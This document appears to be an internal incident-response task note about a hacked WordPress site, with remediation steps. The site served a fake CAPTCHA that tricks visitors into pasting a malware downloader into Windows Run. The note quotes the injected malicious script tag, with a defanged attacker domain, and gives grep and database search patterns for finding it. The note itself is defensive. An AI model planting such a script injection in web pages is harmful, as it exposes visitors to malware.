Summary On 6/16/2026, a prospect (JJ Hepp from Arrow Lift) reported that topreptraining.com is compromised. A malicious script injected into every page's <head> displays a fake CAPTCHA that tricks visitors into running a malware downloader via Windows Run. The site should be treated as fully compromised (attacker had write access).
Malicious payload: <script data-cfasync='false' async src='https://treviro[.]icu/file.js'></script>
What's Been Done So Far JJ Hepp notified Chuck via email (6/16 at 10:33 AM) Jet forwarded the alert to the full team (Mich, Chuck, Ashlee, Chris, Paul, Alea, Mike, Sherrie) Jet attempted to replicate but could not reproduce on his end Urgent email drafted to Mindbees (quote@mindbees.com) with full technical breakdown and remediation steps Thank-you reply drafted to JJ Hepp with Ashlee CC'd so she can field conference questions from Arrow Lift Jet reviewed WP Engine portal and confirmed backup restore capability
What Still Needs to Be Done Immediate (stop the bleeding) Restore from a pre-infection WP Engine backup (WP Engine portal > topreptraining > Backup points > pick a clean date > Restore) Purge all caches (WP Engine + Cloudflare if applicable) Verify the site is clean post-restore (check source for treviro.icu script) Security lockdown Delete any unrecognized admin users in WordPress Rotate ALL credentials: WP admin, SFTP, database, WP Engine portal Update WordPress core, all plugins, and all themes to latest versions Install Wordfence (free) for ongoing scanning and firewall Search database for any remaining traces: wp db search 'treviro.icu' Search filesystem: grep -rn 'treviro.icu\|data-cfasync' wp-content/ wp-config.php index.php Check active theme's functions.php/header.php and wp-content/mu-plugins/ for unauthorized files Coordination Confirm Mindbees received the urgent email and is engaged Open a support ticket with WP Engine for file-integrity diff Report back to the team once the site is confirmed clean Follow up with JJ Hepp / Arrow Lift once resolved (potential Columbus conference attendees)
Related Parent website rebuild task: Original alert email from: JJ Hepp (jj.hepp@arrowlift.com), CC: Pete Newstrom (pete.newstrom@arrow-lift.com) Mindbees contact: quote@mindbees.com
Background On June 16, 2026, JJ Hepp from Arrow Lift (jj.hepp@arrowlift.com) reported that topreptraining.com is serving a malicious fake CAPTCHA that tricks visitors into running a malware downloader. The site is fully compromised — an attacker injected a script into the <head> of every page.
The injection: <script data-cfasync='false' async src='https://treviro[.]icu/file.js'></script>
This shows visitors a fake "verify you're human" CAPTCHA, silently copies a malicious command to their clipboard, and instructs them to paste it into Windows Run (Win+R → Ctrl+V) which executes a malware downloader.
What's Been Done So Far JJ Hepp's email received and triaged (10:33 AM) Jet forwarded the alert to the full team (Mich, Chuck, Ashlee, Chris, Paul, Alea, Mike, Sherrie) at 10:38 AM Urgent email drafted to Mindbees (our web vendor) with full remediation steps — sent from jet@topreptraining.com Thank-you reply drafted to JJ Hepp (CC'd Ashlee to handle conference questions) Jet attempted to replicate on his end but could not reproduce (may be cached or geo-targeted)
What Still Needs To Be Done Immediate (Today) Restore from WP Engine backup — Go to WP Engine portal → topreptraining (Prd) → Backup points → restore from a date before infection Purge all caches — WP Engine cache + Cloudflare (if applicable) Verify site is clean — Check that treviro.icu script is no longer present in page source Security Hardening (This Week) Rotate ALL credentials — WP admin, SFTP, database, WP Engine portal Audit admin users — Delete any unrecognized accounts in Users → All Users Update everything — WordPress core, all plugins, all themes to latest versions Install Wordfence (or Sucuri) for ongoing scanning and firewall Search for persistence — Check:
- wp-content/mu-plugins/ for unauthorized must-use plugins
- Active theme's functions.php and header.php
- Database: wp db search 'treviro.icu' (check wp_options, wp_posts, wp_postmeta)
- Filesystem: grep -rn 'treviro.icu\|data-cfasync' wp-content/ wp-config.php index.php
- Any add_action('wp_head', …) that echoes the script
- Recently modified files
Follow-Up Coordinate with Mindbees — They've been emailed. Follow up if no response by EOD. Open WP Engine support ticket — Request file-integrity diff and confirm backup restore is clean Confirm with JJ Hepp once resolved — Let him know the site is safe and keep the Columbus conference conversation going Post-mortem — Determine how the attacker gained write access to prevent recurrence
Key Contacts Mindbees (web vendor): quote@mindbees.com JJ Hepp (reporter): jj.hepp@arrowlift.com Pete Newstrom (Arrow Lift CEO): pete.newstrom@arrow-lift.com WP Engine Portal: https://my.wpengine.com/sites WP Admin: https://topreptraining.com/wp-admin/ Summary On 6/16/2026, a prospect (JJ Hepp from Arrow Lift) reported that topreptraining.com is compromised. A malicious script injected into every page's <head> displays a fake CAPTCHA that tricks visitors into running a malware downloader via Windows Run. The site should be treated as fully compromised (attacker had write access).
Malicious payload: <script data-cfasync='false' async src='https://treviro[.]icu/file.js'></script>
What's Been Done So Far JJ Hepp notified Chuck via email (6/16 at 10:33 AM) Jet forwarded the alert to the full team (Mich, Chuck, Ashlee, Chris, Paul, Alea, Mike, Sherrie) Jet attempted to replicate but could not reproduce on his end Urgent email drafted to Mindbees (quote@mindbees.com) with full technical breakdown and remediation steps Thank-you reply drafted to JJ Hepp with Ashlee CC'd so she can field conference questions from Arrow Lift Jet reviewed WP Engine portal and confirmed backup restore capability
What Still Needs to Be Done Immediate (stop the bleeding) Restore from a pre-infection WP Engine backup (WP Engine portal > topreptraining > Backup points > pick a clean date > Restore) Purge all caches (WP Engine + Cloudflare if applicable) Verify the site is clean post-restore (check source for treviro.icu script) Security lockdown Delete any unrecognized admin users in WordPress Rotate ALL credentials: WP admin, SFTP, database, WP Engine portal Update WordPress core, all plugins, and all themes to latest versions Install Wordfence (free) for ongoing scanning and firewall Search database for any remaining traces: wp db search 'treviro.icu' Search filesystem: grep -rn 'treviro.icu\|data-cfasync' wp-content/ wp-config.php index.php Check active theme's functions.php/header.php and wp-content/mu-plugins/ for unauthorized files Coordination Confirm Mindbees received the urgent email and is engaged Open a support ticket with WP Engine for file-integrity diff Report back to the team once the site is confirmed clean Follow up with JJ Hepp / Arrow Lift once resolved (potential Columbus conference attendees)
Related Parent website rebuild task: Original alert email from: JJ Hepp (jj.hepp@arrowlift.com), CC: Pete Newstrom (pete.newstrom@arrow-lift.com) Mindbees contact: quote@mindbees.com
Due 2026-08-07